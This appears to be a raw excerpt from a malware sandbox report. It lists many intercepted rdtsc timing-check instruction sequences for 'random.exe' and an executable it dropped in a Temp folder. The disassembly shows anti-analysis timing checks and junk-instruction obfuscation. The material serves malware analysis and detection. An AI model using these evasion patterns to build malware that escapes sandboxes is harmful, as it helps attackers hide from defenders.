Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F602BB second address: 4F602C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F602C1 second address: 4F602F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FDD093B1DEBh 0x00000011 xchg eax, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx ebx, si 0x00000018 mov edx, ecx 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60348 second address: 4F603BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b jmp 00007FDD08CD5757h 0x00000010 sub edi, edi 0x00000012 jmp 00007FDD08CD574Fh 0x00000017 inc ebx 0x00000018 pushad 0x00000019 call 00007FDD08CD5754h 0x0000001e call 00007FDD08CD5752h 0x00000023 pop esi 0x00000024 pop ebx 0x00000025 mov ah, 7Ch 0x00000027 popad 0x00000028 test al, al 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F603BC second address: 4F603C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F603C0 second address: 4F603C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F603C6 second address: 4F603FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDD093B1FA1h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDD093B1DF0h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F603FB second address: 4F6040A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6040A second address: 4F60410 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60410 second address: 4F60414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F604B9 second address: 4F604CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60517 second address: 4F60543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 79AC0D1Ah 0x00000008 mov edi, 3FEDE0E6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 test eax, eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDD08CD5758h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60543 second address: 4F605B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 2934h 0x00000007 push edi 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FDD7A06FD23h 0x00000012 jmp 00007FDD093B1DEFh 0x00000017 js 00007FDD093B1E1Eh 0x0000001d jmp 00007FDD093B1DF6h 0x00000022 cmp dword ptr [ebp-14h], edi 0x00000025 jmp 00007FDD093B1DF0h 0x0000002a jne 00007FDD7A06FCEEh 0x00000030 pushad 0x00000031 movzx esi, dx 0x00000034 mov bx, D6DEh 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+08h] 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FDD093B1DF0h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F605B7 second address: 4F6061B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dh 0x00000005 call 00007FDD08CD574Ah 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lea eax, dword ptr [ebp-2Ch] 0x00000011 jmp 00007FDD08CD5751h 0x00000016 xchg eax, esi 0x00000017 pushad 0x00000018 pushad 0x00000019 movzx ecx, di 0x0000001c mov si, bx 0x0000001f popad 0x00000020 pushfd 0x00000021 jmp 00007FDD08CD574Bh 0x00000026 sub si, 9E4Eh 0x0000002b jmp 00007FDD08CD5759h 0x00000030 popfd 0x00000031 popad 0x00000032 push eax 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6061B second address: 4F6061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6061F second address: 4F60625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60625 second address: 4F6064E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD093B1DEDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6064E second address: 4F606AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007FDD08CD5753h 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007FDD08CD5759h 0x00000019 sub si, 6EA6h 0x0000001e jmp 00007FDD08CD5751h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606AD second address: 4F606B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606B3 second address: 4F606C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606C2 second address: 4F606C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606C6 second address: 4F606E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5757h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606E1 second address: 4F606E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606E7 second address: 4F606EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F606EB second address: 4F6074B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007FDD093B1DF7h 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 call 00007FDD093B1DEBh 0x00000017 pop esi 0x00000018 pushfd 0x00000019 jmp 00007FDD093B1DF9h 0x0000001e sbb ah, 00000026h 0x00000021 jmp 00007FDD093B1DF1h 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6074B second address: 4F6075B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD574Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6075B second address: 4F6075F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6078F second address: 4F60795 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60795 second address: 4F6001A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b pushad 0x0000000c mov si, 215Dh 0x00000010 mov dh, al 0x00000012 popad 0x00000013 test esi, esi 0x00000015 jmp 00007FDD093B1DF5h 0x0000001a je 00007FDD7A06FC6Dh 0x00000020 xor eax, eax 0x00000022 jmp 00007FDD0938B51Ah 0x00000027 pop esi 0x00000028 pop edi 0x00000029 pop ebx 0x0000002a leave 0x0000002b retn 0004h 0x0000002e nop 0x0000002f sub esp, 04h 0x00000032 mov esi, eax 0x00000034 xor ebx, ebx 0x00000036 cmp esi, 00000000h 0x00000039 je 00007FDD093B1F0Dh 0x0000003f call 00007FDD0D505B14h 0x00000044 mov edi, edi 0x00000046 jmp 00007FDD093B1DECh 0x0000004b xchg eax, ebp 0x0000004c pushad 0x0000004d mov ah, dh 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6001A second address: 4F6001E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6001E second address: 4F60022 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60022 second address: 4F60028 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60028 second address: 4F6002E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F6002E second address: 4F60032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60032 second address: 4F60036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60036 second address: 4F600BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FDD08CD5757h 0x00000010 or cl, 0000000Eh 0x00000013 jmp 00007FDD08CD5759h 0x00000018 popfd 0x00000019 mov cx, 0B17h 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007FDD08CD574Ah 0x00000025 xchg eax, ecx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDD08CD574Dh 0x0000002f sub ah, FFFFFFF6h 0x00000032 jmp 00007FDD08CD5751h 0x00000037 popfd 0x00000038 jmp 00007FDD08CD5750h 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F600BE second address: 4F6016A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FDD093B1DEFh 0x00000011 and ax, 2ADEh 0x00000016 jmp 00007FDD093B1DF9h 0x0000001b popfd 0x0000001c pushad 0x0000001d mov ax, 99FDh 0x00000021 pushfd 0x00000022 jmp 00007FDD093B1DEAh 0x00000027 sub ax, 5AD8h 0x0000002c jmp 00007FDD093B1DEBh 0x00000031 popfd 0x00000032 popad 0x00000033 popad 0x00000034 xchg eax, ecx 0x00000035 pushad 0x00000036 mov ecx, 42A493ABh 0x0000003b pushfd 0x0000003c jmp 00007FDD093B1DF0h 0x00000041 sbb esi, 5F292538h 0x00000047 jmp 00007FDD093B1DEBh 0x0000004c popfd 0x0000004d popad 0x0000004e mov dword ptr [ebp-04h], 55534552h 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FDD093B1DF5h 0x0000005c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60CEA second address: 4F60D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75C7459Ch], 05h 0x00000010 jmp 00007FDD08CD574Eh 0x00000015 je 00007FDD79983429h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDD08CD574Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60D30 second address: 4F60D34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60D34 second address: 4F60D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60DF7 second address: 4F60E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 sub esi, esi 0x00000008 pushad 0x00000009 mov dl, D6h 0x0000000b movzx eax, di 0x0000000e popad 0x0000000f mov dword ptr [ebp-1Ch], esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FDD093B1DF3h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60E20 second address: 4F60E26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60E26 second address: 4F60E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD093B1DEBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60E48 second address: 4F60E4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60E4C second address: 4F60E52 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60E52 second address: 4F60E89 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007FDD08CD574Eh 0x00000010 je 00007FDD7997924Ch 0x00000016 pushad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70C84 second address: 4F70C9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70C9F second address: 4F70CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70CA3 second address: 4F70CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70CA9 second address: 4F70D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDD08CD5753h 0x00000013 and ecx, 18F4179Eh 0x00000019 jmp 00007FDD08CD5759h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FDD08CD5750h 0x00000025 xor ax, 4198h 0x0000002a jmp 00007FDD08CD574Bh 0x0000002f popfd 0x00000030 popad 0x00000031 xchg eax, ebp 0x00000032 pushad 0x00000033 mov ax, CD6Bh 0x00000037 mov cx, D547h 0x0000003b popad 0x0000003c mov ebp, esp 0x0000003e jmp 00007FDD08CD574Ah 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70D2B second address: 4F70D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70D2F second address: 4F70D35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70D35 second address: 4F70DCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, ebx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FDD093B1DF3h 0x00000014 or eax, 4E17CD1Eh 0x0000001a jmp 00007FDD093B1DF9h 0x0000001f popfd 0x00000020 push eax 0x00000021 pop edi 0x00000022 popad 0x00000023 popad 0x00000024 xchg eax, esi 0x00000025 pushad 0x00000026 call 00007FDD093B1DF8h 0x0000002b movzx eax, dx 0x0000002e pop edx 0x0000002f mov edx, eax 0x00000031 popad 0x00000032 mov esi, dword ptr [ebp+0Ch] 0x00000035 jmp 00007FDD093B1DF6h 0x0000003a test esi, esi 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f mov ebx, 00AD68C0h 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70DCF second address: 4F70DE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5751h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70DE4 second address: 4F70E9C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FDD7A04F3B1h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FDD093B1DF3h 0x00000015 sbb si, CF4Eh 0x0000001a jmp 00007FDD093B1DF9h 0x0000001f popfd 0x00000020 push ecx 0x00000021 pushfd 0x00000022 jmp 00007FDD093B1DF7h 0x00000027 and ecx, 4C66FD5Eh 0x0000002d jmp 00007FDD093B1DF9h 0x00000032 popfd 0x00000033 pop esi 0x00000034 popad 0x00000035 cmp dword ptr [75C7459Ch], 05h 0x0000003c jmp 00007FDD093B1DF7h 0x00000041 je 00007FDD7A0673FEh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FDD093B1DF5h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70E9C second address: 4F70EA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70EA2 second address: 4F70EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70EA6 second address: 4F70EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70F78 second address: 4F70F96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FDD093B1DF3h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70F96 second address: 4F70FAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5754h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70FAE second address: 4F70FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD093B1DF9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70FD4 second address: 4F70FDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70FDA second address: 4F70FE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: 9002D8 second address: 9002F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: 9002F1 second address: 900314 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDD093B1DF8h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: 900314 second address: 900323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007FDD08CD5746h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A74B3D second address: A74B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A62114 second address: A6211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A6211A second address: A62128 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A62128 second address: A62132 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDD08CD5746h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A62132 second address: A62140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FDD093B1DE6h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A62140 second address: A6217C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5756h 0x00000007 jo 00007FDD08CD5746h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 je 00007FDD08CD575Fh 0x00000016 jbe 00007FDD08CD5759h 0x0000001c jmp 00007FDD08CD574Dh 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A7406C second address: A74085 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDD093B1DF4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A74085 second address: A74092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007FDD08CD5746h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A741E1 second address: A741E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76C4F second address: A76C53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
